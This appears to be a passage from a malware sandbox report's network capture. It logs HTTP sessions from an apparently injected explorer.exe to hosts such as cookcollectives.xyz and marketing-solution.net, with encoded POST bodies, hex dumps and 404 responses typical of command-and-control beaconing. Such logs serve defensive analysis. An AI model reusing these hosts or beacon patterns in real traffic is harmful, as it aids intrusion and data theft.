                                                                                                                    Data Ascii: Gq7OhNH1hj9koXVIfPQA-PqEfjxXTN8WsNVzvur9UIS~-WA69nxk6wMamZYoFo5O2qLuaGrB2G4C8cEYtiuRMCHSSd0p_xYco0_Trv1vizmyB53Z7JS2OhgZkeKOOrKmxI-2OzNKavOljF-RHGc6AE30ComFWoC7MToVYVZxIL1KxddRLi6BaPzs72deoNBlPIKAf8yBfUeQQ9xB3q3gq2BaRxLlfXoekQTBNLkFThqX6SmpdwU
                                                                                                                    May 30, 2023 11:12:23.583935022 CEST1509OUTData Raw: 31 45 41 6d 58 41 79 42 2d 46 42 4f 64 4c 54 31 73 37 54 39 6c 4d 53 4e 45 5a 67 47 4e 53 4a 34 75 56 62 78 4c 5a 75 55 53 77 75 54 65 52 5f 65 69 53 67 38 70 53 49 69 6a 6f 5f 51 59 53 53 6d 76 77 69 46 56 36 66 63 46 76 37 55 69 54 64 58 72 28
                                                                                                                    Data Ascii: 1EAmXAyB-FBOdLT1s7T9lMSNEZgGNSJ4uVbxLZuUSwuTeR_eiSg8pSIijo_QYSSmvwiFV6fcFv7UiTdXr(nd7bjccopDPXdrnc-knzPBV9DiEIY9sxbpkLezsNRuUQ_eL(7clUKS0rRMa39bKuE~dOvpoEREEhuEufMW8I0LiihMv8dhbAIEL(kjXVmJXmSkCjX89z_vMEdlVy_9nlluz09xGFz6UvcnFnu3S88FnkMW04nbfW7
                                                                                                                    May 30, 2023 11:12:23.584084988 CEST1514OUTData Raw: 45 51 5f 65 72 7a 66 4a 51 73 51 72 4e 53 30 4b 73 6d 43 4a 52 45 71 41 72 59 5a 74 4d 28 62 72 4f 68 66 4b 64 72 42 77 58 38 78 63 33 56 2d 6f 79 57 6a 79 65 51 6d 55 4e 4e 49 4b 56 30 42 6c 64 47 53 31 44 65 79 59 4d 28 41 6d 6c 6a 48 67 63 55
                                                                                                                    Data Ascii: EQ_erzfJQsQrNS0KsmCJREqArYZtM(brOhfKdrBwX8xc3V-oyWjyeQmUNNIKV0BldGS1DeyYM(AmljHgcUnkwuiBc7yep9ZKVWz(G7n~O1dDrDSmCPEX1YcNb~WOpV2XIw-UF1Stmdeja8cpIMSdkiRtof8qAr0ASVXVbbDw2tpKc8XQPX3K_QtAE86z4l5XUFBmwELdqhzzx7vN9USvpIrm4fK7plF~T5JcidTDaNOb2mhT9FE
                                                                                                                    May 30, 2023 11:12:23.584422112 CEST1516OUTData Raw: 31 64 58 51 78 72 63 46 49 70 6d 42 31 4b 74 6d 7a 52 36 67 4b 66 61 6a 46 56 55 31 6f 4c 48 66 7a 6c 77 31 7a 7e 65 67 48 6d 56 7e 37 57 7a 57 67 53 55 55 6c 6d 54 33 55 75 31 4a 4c 42 51 71 72 34 66 56 35 38 36 55 46 4e 4d 59 73 63 68 77 31 38
                                                                                                                    Data Ascii: 1dXQxrcFIpmB1KtmzR6gKfajFVU1oLHfzlw1z~egHmV~7WzWgSUUlmT3Uu1JLBQqr4fV586UFNMYschw18IGQNFy3MRCQ4GYhKphSomhAWyTOjjLzWKlQHd3vmfqKyFZEH40kdPxt~5kvZ8cc5jsSDipGBypJY6Ipd9mL4bpiO6NJxzXlgBwGfLpmTKrvWnkE2x0edz7xAImR9OPLpkmSqCG8IZ9n8QnBigVs6q8HvBJW7Z~nro
                                                                                                                    May 30, 2023 11:12:23.584590912 CEST1519OUTData Raw: 50 4d 4f 77 52 67 34 48 42 38 69 4a 63 35 4e 79 52 47 34 53 79 72 42 67 69 42 74 6d 74 6d 69 53 42 7a 6b 41 55 68 2d 73 77 72 44 56 37 4b 32 56 68 42 6d 4d 54 75 74 4d 6f 59 75 69 5a 46 48 30 47 57 39 6e 49 56 31 76 2d 47 49 53 4f 61 39 72 78 63
                                                                                                                    Data Ascii: PMOwRg4HB8iJc5NyRG4SyrBgiBtmtmiSBzkAUh-swrDV7K2VhBmMTutMoYuiZFH0GW9nIV1v-GISOa9rxcY5hGmjDD8s1T9CGidyz1oE6easXyWLS84u34JC9kATxQYuDY699si1jXELgSa8kThjurdCNCiBO96mCdu7Oq0H5M6(EiWl1NmansY7Rdia989RCewbbMX3gE1ORhnEk8dJw4xPHJA(VNsufck61bnyTlXwJR_PPA1
                                                                                                                    May 30, 2023 11:12:23.753429890 CEST1522OUTData Raw: 35 38 5f 77 38 4a 45 55 46 59 42 66 65 6f 6a 72 4b 4d 43 70 4f 5a 68 69 77 58 4e 4c 77 77 46 75 6a 31 31 43 31 67 4b 73 71 59 69 28 58 38 6a 36 79 43 4a 7a 39 51 4a 58 68 67 57 6f 48 39 78 56 6c 37 6f 42 48 4e 4b 70 71 64 68 32 57 79 61 36 63 79
                                                                                                                    Data Ascii: 58_w8JEUFYBfeojrKMCpOZhiwXNLwwFuj11C1gKsqYi(X8j6yCJz9QJXhgWoH9xVl7oBHNKpqdh2Wya6cyIaUeWFByVUCkBVY(K1NE6bVk-hYXLg9vCGU4EEp(dR6yqxo~Me0mcDwIcD1IKDGkxIuDUnO~Ggn~MBsa2gRwcggt8uAimeMc1D882VV~THKw6eNrG7A99Y-ONcZX0QuJFLWr48-ouuwqTRedyL52k~CD5PsLhKEjt
                                                                                                                    May 30, 2023 11:12:23.753587008 CEST1527OUTData Raw: 67 61 64 4d 4c 7e 37 36 32 5a 34 77 6f 34 36 59 6d 33 6b 42 33 75 63 51 70 72 75 4a 46 46 4d 4b 36 74 4e 66 52 35 68 6d 71 46 48 5a 72 48 39 38 73 38 35 78 5a 5a 68 6e 61 37 35 50 45 59 2d 6e 48 28 4f 77 30 67 70 4e 35 35 71 73 6b 44 76 55 57 36
                                                                                                                    Data Ascii: gadML~762Z4wo46Ym3kB3ucQpruJFFMK6tNfR5hmqFHZrH98s85xZZhna75PEY-nH(Ow0gpN55qskDvUW6yDmldm6jNayKV4GqqXT3pI_tV387gdlMbJYlo5vsI1tAfw7IgVyla7Fi7M9Aa0B(sKrRcYujKD4JIhRkhPZx5uLna~2wuvQPsco3xkvZHMlgGkg2ryHDKigoQAB5I9gcUBmq5QdSxU0Zcwe31SCOVLYicy-RWSsNc
                                                                                                                    May 30, 2023 11:12:23.753997087 CEST1528OUTData Raw: 58 4f 34 4c 59 38 59 37 65 63 4d 52 41 36 33 6e 32 6a 36 4c 74 44 64 54 59 6c 73 61 51 5a 35 34 5f 55 6b 31 4d 33 67 38 6e 44 57 75 62 39 4a 6e 61 75 34 37 4b 77 33 6a 66 41 66 77 79 50 79 42 35 54 51 68 69 4f 72 65 38 42 6c 65 4d 46 58 73 43 74
                                                                                                                    Data Ascii: XO4LY8Y7ecMRA63n2j6LtDdTYlsaQZ54_Uk1M3g8nDWub9Jnau47Kw3jfAfwyPyB5TQhiOre8BleMFXsCtYx9TTSNLd(ptqD8cPQqS2mL52Ljeq5smtuup01xYlirvfb1L3yJiHWiUhFAhXTceibaRZozi3V5lmByS6GgfqxR2du5Im(auiz3ZJpXOShwifPSOCNM(mXK0fghVTyd4S644TDlET2HZpzAfEGDyaQE673q2KmERf
                                                                                                                    May 30, 2023 11:12:23.754168034 CEST1532OUTData Raw: 4a 78 74 6f 67 7e 4e 50 6e 34 31 76 78 33 55 6d 77 59 35 73 5a 53 64 52 4f 6e 6c 75 57 6f 77 56 78 61 70 39 55 4b 4b 50 59 7e 50 46 69 72 31 43 48 75 4a 7e 41 4c 33 6d 71 6a 2d 56 49 53 61 50 53 66 5a 76 74 39 6c 76 58 76 41 30 46 4c 47 6c 6b 57
                                                                                                                    Data Ascii: Jxtog~NPn41vx3UmwY5sZSdROnluWowVxap9UKKPY~PFir1CHuJ~AL3mqj-VISaPSfZvt9lvXvA0FLGlkWHnb1RjHqKH7hnqLBlOryRsGl5tlP5e7zqLOzKs7nUbpEIQfR6(mBbegnCdTYKLUCBsTKf6a0e8q8q9iR5GO6Wc0qBTlJTl7vNmIfjo7R8ZgoQN6LqoG1_LS9xo09ZUpcyxEdpMmv35Auhcoplt0N5sHmfImj7mRc5
                                                                                                                    May 30, 2023 11:12:24.052491903 CEST1535INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:12:23 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4406
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-
                                                                                                                    May 30, 2023 11:12:24.052575111 CEST1536INData Raw: 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                                                    Data Ascii: ->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleap
                                                                                                                    May 30, 2023 11:12:24.052638054 CEST1537INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                                                    Data Ascii: <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <li><a href="con
                                                                                                                    May 30, 2023 11:12:24.052691936 CEST1538INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                                                                                                                    Data Ascii: > </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    79192.168.11.2049838199.192.30.14780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:26.099682093 CEST1539OUTGET /tchg/?O0qEM=/2jSjcKJMdr4ffgZ+zzkfBSRTsT2SH0igJpEl+3lX4mpJUIOx7Qie7mq5rJzO4NdwHagEWX+5iltx1Pxra2/KdiiiY2yLTCphg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.cookcollectives.xyz
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:12:26.380362988 CEST1540INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:12:26 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4406
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>
                                                                                                                    May 30, 2023 11:12:26.380444050 CEST1541INData Raw: 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72
                                                                                                                    Data Ascii: ...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http:/
                                                                                                                    May 30, 2023 11:12:26.380503893 CEST1543INData Raw: 20 3c 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: <ul> <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <
                                                                                                                    May 30, 2023 11:12:26.380557060 CEST1543INData Raw: 65 61 72 63 68 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                                                    Data Ascii: earch</a> </div> </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    8192.168.11.204976791.195.240.4580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:24.510998011 CEST336OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.marketing-solution.net
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.marketing-solution.net
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.marketing-solution.net/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 59 6a 57 74 75 6c 67 6b 50 46 69 4e 52 74 33 54 50 4d 28 54 43 62 75 41 55 4f 56 45 76 6b 31 53 69 36 67 44 30 52 44 4f 42 78 4c 70 49 4b 75 5a 6c 42 4b 54 55 56 4b 4d 34 48 54 36 30 7a 6c 6a 7e 59 48 70 4e 69 46 63 65 4a 44 44 59 6e 4e 31 6d 71 66 31 69 57 45 38 4a 47 38 72 34 30 49 36 4c 6c 35 54 41 41 38 33 72 2d 56 38 57 53 72 51 6f 69 31 6b 30 50 7a 75 68 48 57 5a 54 7a 78 4f 5a 48 74 52 75 5a 70 6c 53 6a 4b 45 41 73 31 64 44 6b 7e 46 33 2d 4b 45 55 48 56 6a 73 34 48 73 39 5f 5a 30 75 46 47 70 6c 37 52 67 52 76 62 4c 46 41 51 55 50 35 4c 6a 69 4c 31 67 50 44 6d 4c 70 37 61 45 78 41 73 6d 42 58 50 33 4e 42 7a 35 78 66 37 7a 50 32 47 71 79 47 43 56 6b 4a 66 38 48 6a 52 38 78 76 74 63 6b 56 6c 6b 78 31 4e 67 46 51 59 4d 39 57 62 53 72 6a 65 67 34 53 53 44 37 53 54 4c 6e 75 4b 33 69 32 4f 53 61 47 28 67 4d 34 6e 52 73 4d 76 45 49 55 50 35 44 36 70 46 7e 6d 38 68 4c 61 55 7a 31 6c 64 59 7e 66 6d 73 78 5a 28 2d 63 52 37 34 4f 42 45 4b 74 75 77 4a 76 70 4b 75 7a 64 73 36 58 5f 30 56 43 44 30 57 4d 78 52 4b 47 6e 69 56 73 67 55 59 49 52 39 6b 50 6c 31 43 31 67 4e 58 58 62 48 74 69 76 7e 4d 56 63 74 4e 72 5f 4c 34 30 4d 4f 33 72 37 59 6c 50 35 4e 65 5a 56 68 72 56 36 77 6f 5a 4d 67 6f 28 38 75 5f 78 50 6e 33 59 54 66 5a 52 42 7e 45 4c 75 48 50 47 70 77 6b 79 61 51 38 31 5a 38 70 41 47 63 51 46 77 43 66 67 74 4c 4f 6d 49 64 64 4d 61 4b 6f 49 6e 6d 2d 75 75 61 78 38 4a 69 37 45 50 30 4e 50 4a 44 64 69 35 78 6a 56 44 76 34 5a 61 55 46 45 62 4f 42 7e 55 56 46 7e 59 55 49 4b 30 46 58 59 65 30 69 4a 69 7a 4a 68 46 32 5f 6f 6f 37 6a 47 79 73 2e 00 00 00 00 00 00 00 00
